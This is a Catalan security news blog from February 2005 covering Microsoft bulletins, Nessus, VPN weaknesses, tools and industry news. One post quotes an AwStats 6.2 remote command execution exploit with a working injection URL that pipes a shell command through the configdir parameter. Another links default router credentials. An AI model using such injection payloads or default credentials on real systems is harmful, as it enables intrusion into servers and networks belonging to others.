Google Hack Honeypot està desenvolupat en PHP i és independent de la plataforma. De moment, però, només funciona amb Apache.
|
06:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 15 / febrer / 2005 |
|
dilluns, 14 / febrer / 2005 |
 Nova versió de Nessus, disponible a http://www.nessus.org.
Nessus 2.2.3 contains a new option called "silent dependencies" which can be used to filter out the noise generated by some plugins not directly enabled by the user. It also contains a slightly more intuitive GUI which now contains a "Credentials" tab to put Windows and SSH usernames and passwords.
|
23:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[NTA] VPN Security Flaws White Paper. Estudi sobre el nivell de seguretat de les xarxes privades virtuals:
- El 90% dels accessos remots via VPN tenen vulnerabilitats que poden ser explotades
- Possibilitat d'enumerar els noms d'usuari
Many remote access VPNs have vulnerabilities that allow valid usernames to be guessed through a dictionary attack, because they respond differently to valid and invalid usernames. One of the basic requirements of a username/password authentication scheme is that an incorrect login attempt should not leak information as to whether the username or password was incorrect, because the attacker can then deduce if the username is valid or not. However, many VPN implementations ignore this rule.
- Manca de bones pràctiques d'implementació
- Les VPN són un objectiu pels atacants:
VPNs carry sensitive information over an insecure network and remote access VPNs often allow full access to the internal network, while VPN traffic is usually invisible to IDS monitoring. With increasing security in other areas e.g. more organisations installing firewalls, moving Internet servers onto the DMZ and automatically patching servers, the VPN becomes a more tempting target.
L'estudi és el resultat de la monitorització dels sistemes d'accés remot de grans organitzacions
|
07:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
nms is a set of web programs that are intended as drop-in replacments for the scripts at Matt's Script Archive. Matt's Script Archive (MAS) has been on the web since 1995. It is a repository of web scripts written in Perl by a programmer called Matt Wright.
MSA is probably the most popular repository of web scripts currently available on the internet.
The problem is that the scripts in Matt's Script Archive aren't very good. The scripts are well known amongst the Perl community to be badly written, buggy, and insecure.
(...)
In 2001, the London Perl Mongers decided to address this problem and write a series of drop-in replacements for Matt's scripts. This project is the result.
|
07:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ara fa un any, més o menys, Microsoft imitava a l'ex-ministre Trillo... el responsable de seguretat de Microsoft deia que mai «ningú s'ha aprofitat d'una vulnerabilitat de Windows abans de que es publiqués el pegat».
Ara és el torn d'imitar al ministre Bono tot dient que Windows és més segur que Linux: «Microsoft's Security Chief Says Windows Safer Than Linux».
«Even with the relatively large number of bulletins we released this week, we compare favorably,» he said. «Year-to-date for 2005, Microsoft has fixed 15 vulnerabilities affecting Windows Server 2003. In the same time period, for just this year, Red Hat Enterprise Linux 3 users have had to patch 34 vulnerabilities and SuSE Enterprise Linux 9 users have had to patch over 78 vulnerabilities»
Evidentment s'oblida d'indicar que gairebé totes les vulnerabilitats de Linux són de productes accessoris mentre que moltes vulnerabilitats que cita de Windows són únicament del nucli del sistema operatiu; no inclou les vulnerabilitats de l'Office, per exemple. És a dir, compara patates amb peres...
|
07:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 13 / febrer / 2005 |
Hi ha un howto sobre el tema: How to change the title of an xterm. Es pot fer de forma estàtica, en el moment d'executar-lo:xterm -T "El titol d'aquesta sessió"
o bé de forma dinàmica. Per exemple, amb bash per tenir el nom de la màquina i el directori actual:export PROMPT_COMMAND='echo -ne "\033]0;${HOSTNAME}:
${PWD}007"'
Poques coses hi ha més horribles que cercar una finestra concreta quan tens mitja dotzena minimitzades... Amb aquesta forma, tenim alguna pista (per mi, més que suficient) sobre que és cada sessió.
|
23:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Divendres passat, els usuaris de Microsoft Messenger es van trobar amb l'avís de l'existència d'una nova versió. El motiu de l'anunci: la publicació d'una guia pas a pas de com aprofitar-se de la vulnerabilitat en el procés de les imatges PNG.
Continuació... - També a Hispasec.
|
17:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Diverses webs que ofereixen anàlisi en temps real dels fitxers de registre d'activitat per detectar tendències de nous cucs de propagació massiva:
TRAFEN: This running version of TRAFEN uses our simplest detection model (a scan counting approach recast as a likelihood calculation), and is vulnerable to some false detections. Currently we are evaluating the performance of two models that take the rate of increase into account, one considering the slope of a best-fit straight line, and the other considering the degree of match with the full epidemic model (via a Kalman filter).
WormRadar: Welcome to the home of WormRadar. The chart below is a summary of all worm and probe activity detected by WormRadar nodes around the world, and is refreshed about every 30 minutes. "Summarised" means that multiple hits from a single source IP to a single target IP on a single port, is only counted as one hit.
myNetWatchman: A service that automatically aggregates the firewall logs from a very large number of computers, analyzes these logs for evidence of hacker or worm attacks, and notifies the ISPs where attacks are coming from. As such, it provides a vital level of internetwork security
|
14:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Default Router Usernames and Passwords. Relació d'usuaris i contrasenyes utilitzats per a la configuració dels routers WiFi de diversos fabricants.
This list reflects default usernames and passwords for routers and access points that our software works with to automatically configure security settings.
Mai no saps quan pots necessitar aquesta informació.
|
01:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 12 / febrer / 2005 |
[NetworkWorldFusion] RSA: HP finds place for virus throttling.
New technology on servers and switches from HP will slow virus outbreaks on computer networks that use the HP products, the company said
On Friday, HP announced commercial implementations of technology it calls "virus throttling" that can slow the rate at which viruses and worms spread inside a corporate network. HP is offering the virus throttling software for ProLiant Servers and ProCurve Networking by HP 5300 series switches. HP also unveiled the Security Containment software suite, which locks down software applications that have been compromised by an attack, said Tony Redmond, head of HP's Security Office.
The new software delivers on technology HP unveiled one year ago at the RSA Conference and is part of HP's program to develop technology that keeps computer networks operating in the face of fast-moving attacks. HP will be demonstrating both new technologies at the 2005 RSA Conference next week in San Francisco, Redmond said.
|
19:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Infoworld] Fiorina to get milions, home security. Amb indemnitzacions com aquesta... qui no vol ser acomiadat?
Fiorina will get a cash payout of $21.38 million, and a sum of $50,000 for financial counseling, legal and outplacement services, according to the filing with the U.S. Securities and Exchange Commission.
Fiorina also gets to keep her PC equipment and technical support for a three-month period, HP said in the filing. Additionally, HP will provide the former executive with administrative support for a six-month period and maintenance of her home security system for a one-year period, according to the filing.
The $21.38 million cash payout consists of a $14 million payment that represents 2.5 times Fiorina's base salary and targeted annual cash bonus as well as a $7.38 million payment that is part of an HP incentive program called the long-term performance cash program, according to the filing. In addition, Fiorina will receive an unspecified cash payment for the balance of her unused vacation time.
The $14 million is payable in six months after the agreement date, with interest at an annual rate of 2.78 percent, HP said.
|
18:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Un exemple de com funciona el model del software lliure. Un usuari volia poder fer transferència de fitxers amb el PuTTY, el client SSH per excel·lència als entorns Windows. Com aquest producte no ho permet, va implementar el protocol Zmodem i el va enviar als autors del PuTTY que no el van considerar interessant... Com a resposta, ha decidit publicar-lo pel seu compte... el resultat: Le Putty.
|
15:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
KisKis (Keep It Secret! Keep It Safe!) és un gestor de contrasenyes desenvolupat en Java i que funciona en qualsevol plataforma. Les contrasenyes les emmagatzema dins d'un fitxer XML xifrat, utilitzant els algortimes de l'OpenPGP.
|
14:16 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft Watch] Will Microsoft 'Mako' Take a Bite Out of Windows Security Problems? Microsoft està preparant noves tecnologies de protecció activa que incorporarà properament a Windows. Microsoft 'Mako', el nom en clau d'aquestes tecnologies que es basen en l'anàlisi del comportament i tallafocs a nivell d'aplicació:
- Dynamic-systems-protection technologies, designed to monitor changes in machine state, and which will automatically open and shut ports to lock down systems.
- Behavioral-blocking technologies, which are esigned to limit the impact of worms and viruses by blocking risky user behaviors (like clicking on a random .exe file sent via e-mail).
- Application-aware firewall and intrusion-prevention technologies, which will push the security settings
Aquestes tecnologies inicialment estaven previstes per complementar al SP2 de Windows XP, però ara sembla que formaran part d'un futur producte de seguretat de Microsoft, Titan:
One official with a security vendor working with Microsoft, who requested anonymity, said he thought Microsoft would build on the behavioral-blocking technologies that already are part of the Windows Antispyware product that Microsoft released into beta earlier this month. Microsoft's anti-spyware product is built on top of code that Microsoft purchased when it bought Giant Company Software in December.
Another security source, who also requested anonymity, said he thought Microsoft might roll the behavioral-blocking technology into Microsoft's malicious software removal tool, code-named Titan. Microsoft rolled out this tool earlier this year and is planning to update it each month on "Patch Tuesday." The tool pushes out to Windows users Microsoft's latest virus patches and fixes.
How and whether Mako will be part of Microsoft's forthcoming "A1" anti-virus/anti-spyware/firewall subscription service also is not clear. Microsoft partners said they have seen alpha versions of A1, and expect Microsoft to roll out the fee-based, hosted security service later this year. Microsoft officials have declined to comment on — or even acknowledge — the existence of A1..
|
13:32 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Microsoft ha posat a la web versions d'avaluació de l'edició de 64-bit de Windows XP Professional. Dóna suport a AMD Athlon 64, AMB Opteron, Intel Xeon i Intel EM64T. Es pot demanar que ens enviïn el CD o bé baixar-lo (450 MB). És una versió limitada en el temps, que expira als 360 dies.
|
12:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 11 / febrer / 2005 |
[Boston.com] Music industry sues 83-year-old dead woman. La RIAA (l'equivalent nord-americà de la SGAE... i pel que sembla, amb un nivell d'intel·ligència semblant) presenta una denúncia per pirateria a una dóna de 83 anys... morta el passat desembre.
«My mother was computer illiterate. She hated a computer,» Chianumba said. «My mother wouldn't know how to turn on a computer.»
Chianumba said she faxed a copy of her mother's death certificate to record company officials several days before the lawsuit was filed, in response to a letter from the company regarding the upcoming legal filing.
|
20:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[FCW.com] Hashing out encryption. El NIST, l'organisme que defineix els estàndards a utilitzar pels organismes públics dels Estats Units, té previst aconsellar que es deixi d'utilitzar SHA-1 i es comenci a utilitzar SHA-256 i SHA-512. Es calcula que SHA-1 serà del tot obsolet pels voltants de l'any 2010, quan la capacitat dels ordinadors farà viable els atacs.
|
20:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
XSS-Proxy, una eina que demostra les possibilitats dels atacs XSS. S'instal·la a un servidor web i quan des d'una estació client es segueix un enllaç, l'administrador del servidor web disposa d'un control complet de l'ordinador del client per accedir a la web, d'una forma transparent i sense deixar cap mena de rastre.
|
08:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 10 / febrer / 2005 |
Tot sigui que un sol missatge passi de llarg, últimament s'està posant de moda entre els spammers enviar múltiples còpies (seguides) dels missatges. Aquesta captura mostra com molts dels missatges d'SPAM que detecta l'SpamAssassin de la meva màquina els envien diverses vegades de forma continuada.
|
16:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 9 / febrer / 2005 |
[Hispasec] Herramientas gratuitas de Microsoft para detectar Sniffers. Microsoft ha publicat una eina que permet la detecció de sistemes Windows 2000, XP o 2003 amb una targeta de xarxa en modalitat promíscua (capturant tot el tràfic de la xarxa, que pot fer sospitar l'existència d'un sniffer).
L'eina està disponible en dues versions, totalment equivalents. La primera, Promqry 1.0 funciona des de la línia d'ordres mentre que PromqryUI 1.0 disposa d'una interfície gràfica. L'eina permet verificar un ordinador concret o bé tots els ordinadors que hi ha dins d'un rang d'adreces IP.
Una important limitació d'aquesta eina és que només pot identificar els sistemes Windows amb targetes promíscues. Si l'sniffer s'executa en qualsevol altra plataforma (una appliance o un sistema Unix), no el pot detectar. Més detalls sobre el funcionament d'aquesta eina a Description of Promqry 1.0 and PromqryUI 1.0.
|
18:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Fa un parell de dies em vaig comprar una clau USB d'1 GB (la que feia servir fins ara era només de 16 MB i sempre estava esborrant coses...).
Ara bé, com és un dispositiu USB 2.0 i el meu ordinador només té ports USB 1.1, cada vegada que el connecto em surt un molest missatge dient «This device can perform faster». Prou que ho se, no cal que Windows m'ho recordi :-(
Per desactivar aquest missatge heu d'anar a l'administrador de dispositius de Windows i per a cada controlador USB entrar a les propietats. Dins de les mateixes, aneu a la pestanya d'opcions avançades i veure-ho que hi ha una opció, «Don't tell me about USB errors». Assegureu-vos que està marcada i Windows ja no us tornarà a emprenyar amb aquests missatges inútils.
|
12:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[F-Secure] Commercial Pocket PC software wiping PDA if you use pirated serial code. Una pràctica carent de tota ètica: alguns productes comercials si detecten la utilització d'un número de sèrie pirata, esborren tota la informació
About a week ago a Pocket PC developer who created Pocket Mechanic utility for pocket PC, created update of his software (version 1.50) that deletes all files on the device if user is using one specific pirated serial number. Which means that if user is using such number and upgrades to version 1.50 or downloads 1.50 and enters pirated serial code, he will lose all data.
The current version 1.51 does not contain the trojan functionality anymore.
While pirating software is illegal, so is creating trojans that check whether user has pirated version and damaging that users files. It is sad to see the same bad idea repeating time after time.
|
07:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Mobile Pipeline] 'WiPhishing' Said To Threaten Wi-Fi Users. Consisteix en configurar un portàtil amb un SSID conegut (per exemple, els utilitzat pels diversos proveïdors comercials als seus punts d'accés) i, d'aquesta forma, capturar el tràfic de la gent que es connecti. D'aquesta forma l'atacant pot capturar les dades d'accés o bé espiar el tràfic.
|
07:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Shmoo.com] The state of homograph attacks. Una vulnerabilitat en la implementació d'International Domain Name, IDN (RFC 3743) a Safari, Opera, Omniweb i tots els navegadors derivats de Mozilla (inclosos el propi Mozilla, Firefox 1.0, Camino...). En canvi no afecta a l'Internet Explorer ja que aquest navegador no dóna suport a IDN.
IDN permet la utilització de caràcters internacionals al DN utilitzat als certificats SSL.
Podeu comprovar els efectes d'aquesta vulnerabilitat en aquesta prova de concepte: la URL indica que s'accedeix a una web, però en realitat s'està accedit a una ben diferent... i fins i tot es pot falsejar les pàgines HTTPS amb un certificat fals.
|
07:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 8 / febrer / 2005 |
Com cada segon dimarts de mes, Microsoft ha publicat els butlletins de seguretat d'aquest mes:
MS05-004
Important |
Vulnerabilitat de validació de vies a ASP.NET. Aquesta vulnerabilitat podria permetre a un atacant saltar-se els mecanismes de seguretat d'una seu web programada amb ASP.NET per tal d'obtenir un accés no autoritzat.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft .NET Framework 1.0.
- Microsoft .NET Framework 1.1.
|
MS05-005
Crítica |
Vulnerabilitat a Microsoft Office XP que pot ser utilitzada per un atacant per forçar l'execució de codi remot als sistemes vulnerables. Això pot ser utilitzat per l'atacant per prendre el control dels sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Office XP.
- Microsoft Word 2002.
- Microsoft PowerPoint 2002.
- Microsoft Project 2002.
- Microsoft Visio 2002.
- Microsoft Works Suite 2002.
- Microsoft Works Suite 2003.
- Microsoft Works Suite 2004.
|
MS05-006
Moderada |
Vulnerabilitat CSS i de suplantació als serveis de Microsoft SharePoint Portal Server i Windows Server 2003 per Intel Itanium.
Butlletí de Microsoft |
Sistemes afectats:
- Windows SharePoint Services for Windows Server 2003.
- SharePoint Team Services from Microsoft.
- Microsoft Windows Server 2003 for Itanium-based Systems.
- SharePoint Portal Server 2003.
- SharePoint Portal Server 2001.
|
MS05-007
Important |
Vulnerabilitat a Windows que pot ser utilitzada per obtenir la relació d'usuaris que estan connectat a un recurs compartit de la xarxa.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows XP.
- Microsoft Windows XP amb Service Pack 1.
- Microsoft Windows XP amb Service Pack 2.
- Microsoft Windows XP edició 64-bit amb Service Pack 1 per a processadors Itanium.
|
MS05-008
Important |
Vulnerabilitat en la forma en que Windows processa les accions d'arrossegar i deixar. Aquesta vulnerabilitat pot ser utilitzada per un atacant a través d'una pàgina web i arribar a prendre el control dels sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Service Pack 4.
- Microsoft Windows XP amb Service Pack 1 i Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit per a processadors Itanium.
- Microsoft Windows Server 2003.
- Microsoft Windows Server 2003 per a processadors Itanium.
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
|
MS05-009
Crítica |
Vulnerabilitat en el suport del format PNG a diversos productes de Microsoft que pot ser utilitzada per un atacant per aconseguir l'execució de codi remot al sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows Media Player 9 (quan s'executa a Windows 2000, Windows XP fins a Service Pack 1 -inclòs- i Windows Server 2003).
- Microsoft Windows Messenger 5.
- Microsoft MSN Messenger 6.1.
- Microsoft MSN Messenger 6.2.
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
|
MS05-010
Crítica |
Vulnerabilitat al servei de control de llicències de Windows que pot ser utilitzada per un atacant per tal d'executar codi remot i prendre el control dels sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows NT amb Service Pack 6.0a.
- Microsoft Windows XP Service Pack 1.
- Microsoft Windows XP Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium.
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
|
MS05-011
Crítica |
Vulnerabilitat al protocol SMB que pot ser utilitzada per un atacant per prendre el control del sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Microsoft Windows 2000 amb Service Pack 4.
- Microsoft Windows XP amb Service Pack 1 i Microsoft Windows XP amb Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium.
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 per a processadors Itanium.
|
MS05-012
Crítica |
Vulnerabilitat en la forma que Windows processa els objectes COM i al suport OLE que pot ser utilitzada per un atacant per prendre el control dels sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Microsoft Windows 2000 amb Service Pack 4.
- Microsoft Windows XP amb Service Pack 1 i Microsoft Windows XP amb Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium.
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 per a processadors Itanium.
- Microsoft Exchange 2000 Server Service Pack 3 (component OLE).
- Microsoft Exchange Server 2003 i Microsoft Exchange Server 2003 Service Pack 1 (Component OLE).
- Microsoft Exchange Server 5.0 Service Pack 2 (Component OLE).
- Microsoft Exchange Server 5.5 Service Pack 4 (Component OLE).
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
- Microsoft Office XP Service Pack 3.
- Microsoft Office XP Service Pack 2.
- Microsoft Office XP Service Pack 1.
|
MS05-013
Crítica |
Vulnerabilitat CSS al component ActiveX d'edició DHTML per pot revelar informació sensible o bé permetre l'execució de codi remot als sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Microsoft Windows 2000 amb Service Pack 4.
- Microsoft Windows XP amb Service Pack 1 i Microsoft Windows XP amb Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium.
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 per a processadors Itanium.
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
|
MS05-014
Crítica |
Actualització acumulativa per a l'Internet Explorer 6 amb Service Pack 1 i Internet Explorer 5.x.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Microsoft Windows 2000 amb Service Pack 4 (Internet Explorer 5.01 amb Service Pack 3, Internet Explorer 5.01 amb Service Pack 4, Internet Explorer 6 Service Pack 1).
- Microsoft Windows XP amb Service Pack 1 (Internet Explorer 6 Service Pack 1).
- Microsoft Windows XP amb Service Pack 2 (Internet Explorer 6).
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium (Internet Explorer 6, Internet Explorer 6 Service Pack 1).
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium (Internet Explorer 6).
- Microsoft Windows Server 2003 (Internet Explorer 6 Service Pack 1, Internet Explorer 6).
- Microsoft Windows Server 2003 per a processadors Itanium (Internet Explorer 6).
- Microsoft Windows 98 (Internet Explorer 6 Service Pack 1).
- Microsoft Windows 98 SE (Internet Explorer 6 Service Pack 1).
- Microsoft Windows ME (Internet Explorer 5.5 amb Service Pack 2, Internet Explorer 6 Service Pack 1).
|
MS05-015
Crítica |
Vulnerabilitat a la biblioteca d'objecte hiperenllaç que pot ser utilitzada per un atacant per prendre el control dels sistemes vulnerables.
Butlletí de Microsoft |
Sistemes afectats:
- Microsoft Windows 2000 amb Service Pack 3 i Microsoft Windows 2000 amb Service Pack 4.
- Microsoft Windows XP amb Service Pack 1 i Microsoft Windows XP amb Service Pack 2.
- Microsoft Windows XP edició de 64-bit amb Service Pack 1 per a processadors Itanium.
- Microsoft Windows XP edició de 64-bit versió 2003 per a processadors Itanium.
- Microsoft Windows Server 2003.
- Microsoft Windows Server 2003 per a processadors Itanium.
- Microsoft Windows 98.
- Microsoft Windows 98 SE.
- Microsoft Windows ME.
|
|
22:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Publicat l'Apache 2.0.53. És una actualització funcional i de seguretat (un problema d'ús de memòria que després no s'allibera i que pot permetre atacs DoS i una pífia a mod_ssl que pot provocar el salt de la renegociació SSL). Per a més detalls, consulteu el ChangeLog.
|
18:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 7 / febrer / 2005 |
FreeMind és una versió lliure del software per a la representació d'idees en forma de mapes on es relacionen les diverses opcions. Aquests mapes són bons per a:
- Seguiment de projectes, incloent tasques, relació entre elles...
- Recollida i categorització de la informació que s'obté consultant fonts externes
- Anotacions.
- Tempesta d'idees.
- Adreces d'Internet comentades.
FreeMind està escrit en Java 1.4 i s'inspira en el MindManager.
|
07:31 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 El propers dies 19 i 20 de febrer (dissabte i diumenge) se celebrarà la MaratOO'o 2.0 al campus de Burjassot de la Universitat de València.
La MaratOO'o 2.0 són unes jornades de treball organitzades per Softcatalà on un grup de traductors i correctors voluntaris es reuniran per acabar d'enllestir o, si més no, acabar de donar una empenta important a la traducció i localització de la versió catalana de l'OpenOffice.org 2.0.
NOTA: El dia 20 de febrer hi ha el referèndum de la Constitució Europea. Podeu trobar més informació sobre el vot per correu a la següent adreça web: http://www.correos.es/00/10/0010.asp
El programa de la MaratOO'o 2.0 (encara provisional), és el següent:
Dissabte, 19 de febrer
----------------------
09:00 Arribada al campus, registre, cafè, muntar els equips informàtics.
09:30 Xerrada introductòria a càrrec de Jesús Corrius, repartiment de la guia d'estil i els glossaris.
10:00 Petita sessió introductòria de traducció.
10:30 Xerrada sobre traducció de fitxers PO a càrrec de Jordi Mallach.
11:00 Sessió de traducció.
12:30 Descans.
12:45 Sessió de traducció.
14:00 Dinar.
15:30 Xerrada per avaluar el progrés, dubtes, etc.
15:45 Sessió de traducció.
17:45 Berenar.
18:15 Xerrada per avaluar el progrés, dubtes, etc.
18:30 Sessió de traducció.
19:30 Fi del primer dia
Diumenge, 20 de febrer
----------------------
09:00 Arribada al campus, cafè, muntar els equips informàtics.
09:30 Xerrada per avaluar el progrés, dubtes, etc.
10:00 Sessió de traducció.
12:00 Descans.
12:30 Sessió de traducció.
14:00 Dinar.
15:30 Xerrada per avaluar el progrés, dubtes, etc.
15:45 Sessió de traducció.
17:45 Xerrada de comiat i avaluació final.
18:00 Fi de la MaratOO'o.
Durant els dos dies disposarem d'accés lliure als laboratoris d'informàtica de l'edifici d'investigació del campus de Burjassot de la Universitat de València, amb un bon accés a internet per tal que tothom qui ho vulgui pugui participar-hi també virtualment a través del canal #softcatala al servidor irc.gimp.org:6666.
La base del programa és la traducció de la versió catalana de l'OpenOffice.org 1.1.0. Per traduir el programa es necessita un bon coneixement de l'anglès i s'utilitzaran les regles de traducció de la Guia d'Estil i el glossari de Softcatalà, per tant és important que tots els participants els coneguin per poder participar en la MaratOO'o.
Podeu trobar aquests documents a les següents adreces:
Recull de termes:
http://www.softcatala.org/projectes/eines/recull/recull.htm
Guia d'estil:
http://www.softcatala.org/projectes/eines/guiaestil/guiaestil.htm
Glossari específic de l'OpenOffice.org:
http://www.softcatala.org/projectes/openoffice/glossari.htm
La MaratOO'o 2.0 està adreçada a persones amb coneixements informàtics de tots els nivells, és per això que al llarg d'aquesta es realitzaran xerrades introductòries per tal que tothom qui ho desitgi pugui fer història aportant el seu gra de sorra a la versió catalana de l'OpenOffice.org 2.0.
Per tal d'acabar d'organitzar la MaratOO'o (especialment per temes d'allotjament), necessitem saber el número de persones interessades en participar-hi. Si us plau, confirmeu la vostra assistència enviant un missatge amb el vostre nom i el dies els quals voleu participar a la següent adreça de correu electrònic: maratooo@softcatala.net
La MaratOO'o 2.0 és l'esdeveniment més important de l'any relacionat amb el Programari Lliure i la llengua catalana. No deixis que t'ho expliquin, perquè no es podrà explicar!
|
02:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Hi ha un exploit que s'aprofita d'una vulnerabilitat del programa d'estadístiques del tràfic web awstats.pl.
This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the user input for the `configdir` parameter. If the users sends a command prefixed and postfixed with | , the command will be executed. An example would be:
Let's execute '/usr/bin/w':
http://localhost/cgi-bin/awstats.pl?
configdir=%20|%20/usr/bin/w%20|%20
Awstat output:
Error: LogFile parameter is not defined in config/
domain file
Setup (' | /usr/bin/w | /awstats.localhost.conf'
file, web server or permissions) may be wrong.
Check config file, permissions and AWStats
documentation (in 'docs' directory).
That's it. Our command was executed.
This bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable AwStat is still available for download on several sites.
|
01:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Sun Blueprint] Solaris Patch Management: Recommended Strategy. Document de Sun on s'expliquen els diversos tipus de pegats i actualitzacions disponibles per a Solaris, la relacions entre ells, els diversos mètodes de distribució i les pràctiques recomanades per mantenir convenientment actualitzats els sistemes tenint presents les consideracions de risc, cost i temps necessari.
|
00:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 6 / febrer / 2005 |
[PC World] World's Largest Linux Migration Gets Major Boost. La companyia ferroviaria acaba d'anunciar la migració de 55.000 usuaris de Lotus Notes a Linux. Es tracta d'un dels projectes de migració a Linux més importants de tot el món:
The company has already shifted its vital train time-tabling system from HP Non-Stop to Linux. Next, it will move various SAP systems, including sales support, from UNIX to Linux. And by the end of the year, all remaining critical systems--including databases, application servers, Web servers, mail servers, and network infrastructure--will be running on Linux, the company said.
|
21:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 KeyCaps600 és una utilitat indispensable pels usuaris del Treo 600 (i també 650), ja que facilita la utilització del teclat per a l'escriptura de textos.
En la configuració per defecte, per introduir un caràcter en majúscules al Treo cal prémer la tecla Shift i, després la tecla en qüestió. El mateix succeeix amb els caràcters especials: cal introduir el caràcter associat i després la tecla Alt per escollir el caràcter especial.
Amb KeyCaps la introducció es fa més natural: per escriure una majúscula només cal prémer una estona la tecla (el període de temps és configurable; 300 milisegons és el període que jo he escollit). És a dir, per a escriure la A majúscula només haurem de prémer durant 300 milisegons la tecla A i automàticament la tindrem en majúscules). Amb els caràcters especials, només cal prémer dues vegades seguides la tecla.
Un cop instal·lat i habilitat KeyCaps600 la modificació funciona amb totes les aplicacions.
KeyCaps600 és software lliure i, com a tal, es distribueix amb el seu codi font en C.
|
20:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Senzillament costa de creure... després de mesos i mesos d'endarreriments injustificats en la disponibilitat del Treo 650 model GSM (el qual, per cert, encara no està anunciat oficialment a Europa; només s'anuncia de forma 'oficiosa' al Regne Unit, si bé a la web encara no hi surt).
I si amb això no n'hi havia prou, als de PalmOne no se'ls acut res més que, tot just un dia després d'anunciar la disponibilitat del model GSM als Estats Units, pujar el preu en 100 dòlars (gairebé un 15%). És una mesura totalment injustificada, pensada per aprofitar-se de la impaciència dels usuaris i l'excusa de que era un error no se la creu ningú.
|
19:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Nicolas Jacobsen, un californià de vint-i-un anys, ha estat espiant les comunicacions dels agents del servei secret dels Estats Units durant un any, com a mínim, segons explica "Security Focus". Jacobsen va entrar a les màquines del gegant T-Mobile, que ofereix telefonia, correu electrònic i emmagatzemament de fitxers. Va robar dades dels seus 16 milions de clients, entre ells agents del servei secret, els que va suplantar en diverses ocasions, utilitzant el seu número d'identificació i contrasenya i també va robar informació secreta.
Continuació...
|
16:16 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
«Han xalat de debò». Era la conclusió dels organitzadors del primer concurs de «wardriving« de Catalunya. El «wardriving» consisteix en anar pel carrer, amb un ordinador portàtil i una antena, i detectar les xarxes sense fils dels veïns, a partir de les ones que emeten. El torneig es limitava al barri de Sant Antoni de Barcelona, on 30 intrèpids caçadors de xarxes en van localitzar més de quatre-centes, en quatre hores.
Continuació...
|
16:05 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
